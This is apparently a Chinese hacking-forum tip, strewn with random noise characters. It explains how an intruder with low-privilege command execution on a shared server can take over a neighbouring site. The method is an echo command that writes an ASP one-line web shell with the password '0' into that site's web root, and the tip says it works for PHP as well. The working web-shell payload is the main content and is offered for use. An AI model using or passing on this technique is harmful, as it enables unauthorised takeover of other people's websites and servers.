在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。; E9 y$ |6 z7 s W1 k& p4 y
* |2 I# Z1 {; h" C0 U; W; T- e' `- B命令格式0 F3 I8 y4 j! w5 D( g, z$ N1 j
6 f& \# b9 b2 z' \% G2 \1 `# Q( JEcho 语句 >目标站绝对目录6 g2 M* O% X$ H
& N9 K/ `/ [% @ E' i0 v
例如:
! j+ f) h4 y! }3 N$ a9 l7 ]6 L* a; ^2 p9 p. b5 r* q' A4 o2 o
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
! x% U6 ?2 c( Q z2 [, ?: `* W. j i
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。! c8 \9 S3 u+ Z' U0 W
|